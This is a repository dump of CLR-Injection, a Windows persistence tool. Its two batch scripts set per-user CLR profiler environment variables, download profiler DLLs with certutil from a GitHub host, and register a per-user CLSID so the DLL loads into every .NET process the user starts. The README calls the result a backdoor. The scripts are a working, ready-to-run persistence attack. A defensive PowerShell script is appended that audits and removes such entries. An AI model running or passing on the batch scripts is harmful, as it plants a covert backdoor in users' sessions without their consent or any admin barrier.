├── CLR-Injection_x64.bat
├── CLR-Injection_x86.bat
├── README.md
├── autorun.png
└── poc.gif

--------------------------------------------------------------------------------
/CLR-Injection_x64.bat:
--------------------------------------------------------------------------------
::Inspired by @subTee
::No administrator rights needed: everything is written under the current user's hive
::Requires a reboot or a log off / log on, because new user environment variables only reach processes started after the session is recreated
::Injects into every .NET (CLR) process started by this user
::Supports x86 and x64 processes (64-bit Windows)
::Set the two per-user environment variables the CLR reads at startup (stored under HKCU\Environment)
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
::Download the 32-bit and 64-bit profiler DLLs into the current directory, then clear certutil's URL cache entries
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete
::Register the CLSID in the per-user Classes hive; 64-bit processes read this branch
::%CD% is the directory the script runs from: move the DLLs afterwards and the profiler no longer loads
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
::32-bit processes on 64-bit Windows read the WoW6432Node branch instead, so register the 32-bit DLL there
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

--------------------------------------------------------------------------------
/CLR-Injection_x86.bat:
--------------------------------------------------------------------------------
::Inspired by @subTee
::No administrator rights needed: everything is written under the current user's hive
::Requires a reboot or a log off / log on, because new user environment variables only reach processes started after the session is recreated
::Injects into every .NET (CLR) process started by this user
::32-bit Windows variant: only the 32-bit DLL and the plain CLSID branch are needed
::Set the two per-user environment variables the CLR reads at startup (stored under HKCU\Environment)
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
::Download the 32-bit profiler DLL into the current directory, then clear certutil's URL cache entry
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete
::Register the CLSID in the per-user Classes hive
::%CD% is the directory the script runs from: move the DLL afterwards and the profiler no longer loads
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CLR-Persistence
Use the CLR profiling API to inject into every .NET application the user runs

- Inspired by @subTee
- No administrator rights needed (all changes live under HKEY_CURRENT_USER)
- Requires a reboot or a log off and log on before it takes effect
- Injects into every .NET application
- Supports x86 and x64

How it works: the scripts set the per-user environment variables `COR_ENABLE_PROFILING=1` and `COR_PROFILER=<CLSID>`, then register that CLSID under `HKCU\Software\Classes\CLSID` (and `WoW6432Node\CLSID` for 32-bit processes on 64-bit Windows) with `InProcServer32` pointing at the profiler DLL. The CLR loads the registered profiler DLL into every managed process started with those variables in its environment. Because the CLSID is resolved through the per-user Classes hive, no write to HKLM is required.

POC:

![Alt text](https://raw.githubusercontent.com/3gstudent/CLR-Injection/master/poc.gif)


Whenever the system starts a .NET application in the user's session, the CLR loads the profiler DLL and the backdoor runs automatically.

:D

![Alt text](https://raw.githubusercontent.com/3gstudent/CLR-Injection/master/autorun.png)

More details:

https://3gstudent.github.io/Use-CLR-to-maintain-persistence

--------------------------------------------------------------------------------
/autorun.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/3gstudent/CLR-Injection/175318105733c6fdaaa2adaa2196473ebc7c74ad/autorun.png

--------------------------------------------------------------------------------
/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/3gstudent/CLR-Injection/175318105733c6fdaaa2adaa2196473ebc7c74ad/poc.gif
--------------------------------------------------------------------------------
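The following PowerShell script is an added example for defenders and is not part of the 3gstudent/CLR-Injection repository. It audits the locations the batch scripts above write to (the per-user `HKCU:\Environment` variables and the per-user `CLSID` / `WoW6432Node\CLSID` registrations), resolves the `COR_PROFILER` CLSID to the DLL that would be loaded, and with `-Remove` tears the per-user persistence down. It goes slightly beyond the page: it also checks the system-wide environment key and the `COR_PROFILER_PATH` / `CORECLR_*` variable names, which reach the same profiler loader without a CLSID registration; the registry paths and the HKCU-before-HKLM lookup order are assumptions stated in the comments.

```powershell
# Added example, not code from the CLR-Injection repo: audit and optionally remove
# CLR profiler persistence set via COR_ENABLE_PROFILING / COR_PROFILER.
# Run as the user whose session is being checked; -Remove deletes per-user entries only.
param([switch]$Remove)

# Names the CLR consults. COR_ENABLE_PROFILING and COR_PROFILER are what the scripts set;
# the *_PATH and CORECLR_* names are added here because they load a profiler the same way.
$varNames = 'COR_ENABLE_PROFILING','COR_PROFILER','COR_PROFILER_PATH',
            'CORECLR_ENABLE_PROFILING','CORECLR_PROFILER','CORECLR_PROFILER_PATH'

# Assumed storage: user variables (what "wmic ENVIRONMENT create ... username=" writes)
# live under HKCU\Environment; system variables under the Session Manager key.
$envKeys = @{
    'User'   = 'HKCU:\Environment'
    'System' = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
}

function Resolve-ProfilerClsid {
    param([string]$Clsid)
    # Assumed lookup order mirrors HKCR: per-user Classes shadow machine-wide ones.
    # 32-bit processes on 64-bit Windows read the WoW6432Node branch.
    $paths = @(
        "HKCU:\Software\Classes\CLSID\$Clsid\InProcServer32",
        "HKCU:\Software\Classes\WoW6432Node\CLSID\$Clsid\InProcServer32",
        "HKLM:\Software\Classes\CLSID\$Clsid\InProcServer32",
        "HKLM:\Software\Classes\WoW6432Node\CLSID\$Clsid\InProcServer32"
    )
    foreach ($p in $paths) {
        if (Test-Path $p) {
            $dll = (Get-ItemProperty -Path $p).'(default)'
            [pscustomobject]@{
                Key    = $p
                Dll    = $dll
                Exists = [bool]($dll -and (Test-Path -LiteralPath $dll))
            }
        }
    }
}

# Collect every profiler-related variable in both scopes.
$findings = @()
foreach ($scope in $envKeys.Keys) {
    $key = $envKeys[$scope]
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($name in $varNames) {
        $value = $props.$name
        if ($null -ne $value) {
            $findings += [pscustomobject]@{ Scope = $scope; Key = $key; Name = $name; Value = $value }
        }
    }
}

if (-not $findings) {
    Write-Output 'No CLR profiler environment variables found.'
    return
}

$findings | Format-Table -AutoSize

# Only the *_PROFILER variables hold a CLSID; *_PATH variables already name the DLL.
foreach ($f in ($findings | Where-Object { $_.Name -like '*_PROFILER' })) {
    Write-Output "Resolving $($f.Name) = $($f.Value)"
    Resolve-ProfilerClsid -Clsid $f.Value | Format-Table -AutoSize
}

if ($Remove) {
    foreach ($f in $findings) {
        Remove-ItemProperty -Path $f.Key -Name $f.Name -ErrorAction SilentlyContinue
        if ($f.Name -like '*_PROFILER') {
            foreach ($hit in (Resolve-ProfilerClsid -Clsid $f.Value)) {
                # Delete per-user CLSID keys only; HKLM entries need admin rights and review first.
                if ($hit.Key -like 'HKCU:*') {
                    Remove-Item -Path (Split-Path $hit.Key -Parent) -Recurse -Force
                }
            }
        }
    }
    Write-Output 'Removed. Log off and back on so already-running processes drop the variables.'
}
```

Run it as `.\Check-ClrProfiler.ps1` to report, or `.\Check-ClrProfiler.ps1 -Remove` to clean up; a hit whose DLL sits in a user-writable directory and whose CLSID is registered only under HKCU is the pattern the batch scripts above produce. Removing the variables does not unload the DLL from processes that already have it, which is why the script ends by asking for a log off.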